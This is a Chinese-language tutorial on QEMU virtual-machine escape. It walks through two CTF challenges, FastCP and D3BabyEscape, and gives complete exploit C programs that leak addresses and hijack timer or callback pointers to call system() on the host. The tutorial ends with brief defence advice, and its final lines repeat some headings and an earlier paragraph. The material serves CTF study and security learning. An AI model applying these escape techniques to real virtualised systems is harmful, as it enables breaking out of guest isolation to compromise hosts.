QEMU逃逸入门及例题复现教学文档<\/h1>

1. QEMU逃逸基础概念<\/h2>

1.1 什么是QEMU逃逸<\/h3>
QEMU逃逸是指从虚拟机内部突破虚拟化隔离，获取宿主机权限的攻击方式。攻击者通过利用QEMU模拟设备中的漏洞，实现从虚拟机内部攻击QEMU进程本身。<\/p>

1.2 QEMU逃逸的本质<\/h3>

攻击目标是QEMU这个ELF可执行文件本身<\/li>
QEMU作为软件实现的虚拟化方案，包含各种可被利用的函数<\/li>

通过泄露信息和控制流劫持，最终目标是获取宿主机shell<\/li> <\/ul>

1.3 常用指令<\/h3>

lspci  # 查看PCI设备信息<\/span>
<\/span><\/span>ls \/sys\/devices\/pci0000\:<\/span>00\/0000\:<\/span>00\:<\/span>04.0\/  # 查看设备资源<\/span>
<\/span><\/span>
<\/span><\/span># 监控QEMU<\/span>
<\/span><\/span>-monitor telnet:127.0.0.1:4444,server,nowait
<\/span><\/span>nc 127.0.0.1 4444<\/span>  # 连接监控接口<\/span>
<\/span><\/span>info pci  # 查看PCI设备详细信息<\/span>
<\/span><\/span><\/code><\/pre>2. 环境准备与调试方法<\/h2>
2.1 准备EXP环境<\/h3>
mkdir exp
<\/span><\/span>cp .\/initramfs-busybox-x64.cpio.gz .\/exp\/
<\/span><\/span>cd exp
<\/span><\/span>gunzip .\/initramfs-busybox-x64.cpio.gz 
<\/span><\/span>cpio -idmv < .\/initramfs-busybox-x64.cpio
<\/span><\/span>
<\/span><\/span>mkdir root
<\/span><\/span>cp ..\/exp.c .\/root\/
<\/span><\/span>gcc .\/root\/exp.c -o .\/root\/exp -static 
<\/span><\/span>find . | cpio -o --format=<\/span>newc > initramfs-busybox-x64.cpio
<\/span><\/span>gzip initramfs-busybox-x64.cpio
<\/span><\/span>cp initramfs-busybox-x64.cpio.gz ..
<\/span><\/span><\/code><\/pre>2.2 调试方法<\/h3>

直接调试QEMU进程<\/strong>:<\/li>
<\/ol>
gdb qemu
<\/span><\/span>set args <启动参数>
<\/span><\/span><\/code><\/pre>
附加到运行中的QEMU进程<\/strong>:<\/li>
<\/ol>
.\/launch.sh
<\/span><\/span>ps -ef | grep qemu  # 获取进程ID<\/span>
<\/span><\/span>gdb -p <进程号>
<\/span><\/span><\/code><\/pre>
在QEMU源码中设置断点<\/strong>:<\/li>
<\/ol>
b fastcp_mmio_write
<\/span><\/span>c
<\/span><\/span><\/code><\/pre>3. 关键知识点<\/h2>
3.1 地址空间转换<\/h3>

MMIO (Memory Mapped I\/O)<\/strong>: 通过内存映射方式访问设备寄存器<\/li>
PMIO (Port Mapped I\/O)<\/strong>: 通过特定端口访问设备寄存器<\/li>
<\/ul>
3.2 地址转换函数<\/h3>
\/\/ 用户虚拟地址到物理地址转换
<\/span><\/span><\/span><\/span>uint64_t<\/span> gva_to_gpa<\/span>(void<\/span>*<\/span> addr) {
<\/span><\/span>    uint64_t<\/span> gfn =<\/span> gva_to_gfn(addr);  \/\/ 获取页帧号
<\/span><\/span><\/span><\/span>    return<\/span> (gfn <<<\/span> PAGE_SHIFT) |<\/span> page_offset((uint64_t<\/span>)addr);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 常见漏洞类型<\/h3>

越界读写<\/li>
缺少边界检查<\/li>
回调函数控制<\/li>
<\/ol>
4. FastCP例题分析<\/h2>
4.1 漏洞分析<\/h3>

漏洞位于fastcp_mmio_write<\/code>函数<\/li>
通过控制timer结构体实现任意函数执行<\/li>
资源类型为MMIO (resource0)<\/li>
<\/ul>
4.2 利用步骤<\/h3>


泄露信息<\/strong>:<\/p>

利用越界读取泄露timer结构体<\/li>
计算PIE基址和system函数地址<\/li>
<\/ul>
<\/li>

构造恶意timer<\/strong>:<\/p>
struct<\/span> QEMUTimer timer;
<\/span><\/span>timer.expire_time =<\/span> 0xffffffffffffffff<\/span>;
<\/span><\/span>timer.timer_list =<\/span> *<\/span>(uint64_t<\/span>*<\/span>)(&<\/span>userbuf[0x8<\/span>]);
<\/span><\/span>timer.cb =<\/span> system_plt;  \/\/ 目标函数
<\/span><\/span><\/span><\/span>timer.opaque =<\/span> struct_head +<\/span> 0xa00<\/span> +<\/span> 0x1000<\/span> +<\/span> 0x30<\/span>;  \/\/ 参数
<\/span><\/span><\/span><\/span>strcpy(&<\/span>timer.shell, "echo flag{a_test_flag}"<\/span>);  \/\/ 命令
<\/span><\/span><\/span><\/code><\/pre><\/li>

覆盖timer结构体<\/strong>:<\/p>

使用fastcp_do_movebuffer<\/code>覆盖原timer<\/li>
触发回调执行<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 完整EXP<\/h3>
#include<\/span> <assert.h><\/span>
<\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span>
<\/span><\/span><\/span>#include<\/span> <inttypes.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/mman.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/io.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 地址转换和MMIO操作函数...
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span>*<\/span> argv[]) {
<\/span><\/span>    \/\/ 初始化MMIO
<\/span><\/span><\/span><\/span>    int<\/span> mmio_fd =<\/span> open("\/sys\/devices\/pci0000:00\/0000:00:04.0\/resource0"<\/span>, O_RDWR |<\/span> O_SYNC);
<\/span><\/span>    mmio_mem =<\/span> mmap(0<\/span>, 0x100000<\/span>, PROT_READ |<\/span> PROT_WRITE, MAP_SHARED, mmio_fd, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 准备用户缓冲区
<\/span><\/span><\/span><\/span>    userbuf =<\/span> mmap(0<\/span>, 0x2000<\/span>, PROT_READ |<\/span> PROT_WRITE, MAP_SHARED |<\/span> MAP_ANONYMOUS, -<\/span>1<\/span>, 0<\/span>);
<\/span><\/span>    mlock(userbuf, 0x10000<\/span>);
<\/span><\/span>    phy_userbuf =<\/span> gva_to_gpa(userbuf);
<\/span><\/span>    
<\/span><\/span>    \/\/ 泄露timer结构体获取基址
<\/span><\/span><\/span><\/span>    fastcp_do_readfrombuffer(phy_userbuf, 0x1030<\/span>);
<\/span><\/span>    fastcp_do_writetobuffer(phy_userbuf +<\/span> 0x1000<\/span>, 0x30<\/span>);
<\/span><\/span>    fastcp_do_readfrombuffer(phy_userbuf, 0x30<\/span>);
<\/span><\/span>    
<\/span><\/span>    uint64_t<\/span> leak_timer =<\/span> *<\/span>(uint64_t<\/span>*<\/span>)(&<\/span>userbuf[0x10<\/span>]);
<\/span><\/span>    uint64_t<\/span> pie_base =<\/span> leak_timer -<\/span> 0x4dce80<\/span>;
<\/span><\/span>    uint64_t<\/span> system_plt =<\/span> pie_base +<\/span> 0x2C2180<\/span>;
<\/span><\/span>    uint64_t<\/span> struct_head =<\/span> *<\/span>(uint64_t<\/span>*<\/span>)(&<\/span>userbuf[0x18<\/span>]);
<\/span><\/span>    
<\/span><\/span>    \/\/ 构造并覆盖timer
<\/span><\/span><\/span><\/span>    struct<\/span> QEMUTimer timer;
<\/span><\/span>    memset(&<\/span>timer, 0<\/span>, sizeof<\/span>(timer));
<\/span><\/span>    timer.expire_time =<\/span> 0xffffffffffffffff<\/span>;
<\/span><\/span>    timer.timer_list =<\/span> *<\/span>(uint64_t<\/span>*<\/span>)(&<\/span>userbuf[0x8<\/span>]);
<\/span><\/span>    timer.cb =<\/span> system_plt;
<\/span><\/span>    timer.opaque =<\/span> struct_head +<\/span> 0xa00<\/span> +<\/span> 0x1000<\/span> +<\/span> 0x30<\/span>;
<\/span><\/span>    strcpy(&<\/span>timer.shell, "echo flag{a_test_flag}"<\/span>);
<\/span><\/span>    
<\/span><\/span>    memcpy(userbuf +<\/span> 0x1000<\/span>, &<\/span>timer, sizeof<\/span>(timer));
<\/span><\/span>    fastcp_do_movebuffer(gva_to_gpa(userbuf +<\/span> 0x1000<\/span>) -<\/span> 0x1000<\/span>, 
<\/span><\/span>                        gva_to_gpa(userbuf +<\/span> 0x1000<\/span>) -<\/span> 0x1000<\/span>, 
<\/span><\/span>                        0x1000<\/span> +<\/span> sizeof<\/span>(timer));
<\/span><\/span>    fastcp_do_cmd(1<\/span>);  \/\/ 触发执行
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>5. D3BabyEscape例题分析<\/h2>
5.1 漏洞分析<\/h3>

设备名: l0dev<\/li>
同时存在MMIO和PMIO接口<\/li>
关键漏洞:

MMIO: 可控制offset实现任意读<\/li>
PMIO: magic=1时可任意写<\/li>
存在回调函数可被控制<\/li>
<\/ul>
<\/li>
<\/ul>
5.2 利用步骤<\/h3>

通过MMIO泄露libc地址<\/li>
计算system函数地址<\/li>
设置magic标志<\/li>
覆盖回调函数为system<\/li>
触发执行<\/li>
<\/ol>
5.3 完整EXP<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdint.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/mman.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/io.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ MMIO\/PMIO操作函数...
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 初始化MMIO
<\/span><\/span><\/span><\/span>    int<\/span> mmio_fd =<\/span> open("\/sys\/devices\/pci0000:00\/0000:00:04.0\/resource0"<\/span>, O_RDWR |<\/span> O_SYNC);
<\/span><\/span>    mmio_mem =<\/span> mmap(NULL, 0x1000<\/span>, PROT_READ |<\/span> PROT_WRITE, MAP_SHARED, mmio_fd, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置IO权限
<\/span><\/span><\/span><\/span>    if<\/span>(iopl(3<\/span>) ==<\/span> -<\/span>1<\/span>) {
<\/span><\/span>        perror("iopl"<\/span>);
<\/span><\/span>        exit(EXIT_FAILURE);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 泄露libc地址
<\/span><\/span><\/span><\/span>    mmio_write(128<\/span>, 0x100<\/span>);
<\/span><\/span>    size_t libc_addr =<\/span> mmio_read(4<\/span>);
<\/span><\/span>    libc_addr =<\/span> libc_addr -<\/span> 0x460a0<\/span>;  \/\/ srandom偏移
<\/span><\/span><\/span><\/span>    size_t system_addr =<\/span> libc_addr +<\/span> 0x50d70<\/span>;
<\/span><\/span>    
<\/span><\/span>    \/\/ 设置magic并覆盖函数指针
<\/span><\/span><\/span><\/span>    pmio_write(0<\/span>, 666<\/span>);  \/\/ 设置magic
<\/span><\/span><\/span><\/span>    pmio_read(0<\/span>);
<\/span><\/span>    pmio_write(20<\/span>, system_addr);  \/\/ 覆盖rand_r为system
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ 触发执行
<\/span><\/span><\/span><\/span>    mmio_write(64<\/span>, 0x6873<\/span>);  \/\/ "sh"的ASCII
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6. 总结与防御<\/h2>
6.1 常见攻击面<\/h3>

MMIO\/PMIO处理逻辑漏洞<\/li>
回调函数控制<\/li>
内存管理错误<\/li>
<\/ol>
6.2 防御建议<\/h3>

严格检查所有输入边界<\/li>
限制回调函数的权限<\/li>
启用QEMU的安全特性(如SMEP\/SMAP)<\/li>
定期更新QEMU版本<\/li>
<\/ol>
6.3 学习资源<\/h3>

QEMU官方文档<\/li>
虚拟化安全研究论文<\/li>
CTF比赛中的QEMU逃逸题目<\/li>
<\/ol>
通过本教程，你应该已经掌握了QEMU逃逸的基本原理和实战技巧。建议在实际环境中练习这两个例题，加深对漏洞利用过程的理解。<\/p>

QEMU逃逸入门及例题复现教学文档<\/h1>

1. QEMU逃逸基础概念<\/h2>

1.1 什么是QEMU逃逸<\/h3> QEMU逃逸是指从虚拟机内部突破虚拟化隔离，获取宿主机权限的攻击方式。攻击者通过利用QEMU模拟设备中的漏洞，实现从虚拟机内部攻击QEMU进程本身。<\/p>

2. 环境准备与调试方法<\/h2>

3. 关键知识点<\/h2>

4. FastCP例题分析<\/h2>

5. D3BabyEscape例题分析<\/h2>

6. 总结与防御<\/h2>

1.1 什么是QEMU逃逸<\/h3>
QEMU逃逸是指从虚拟机内部突破虚拟化隔离，获取宿主机权限的攻击方式。攻击者通过利用QEMU模拟设备中的漏洞，实现从虚拟机内部攻击QEMU进程本身。<\/p>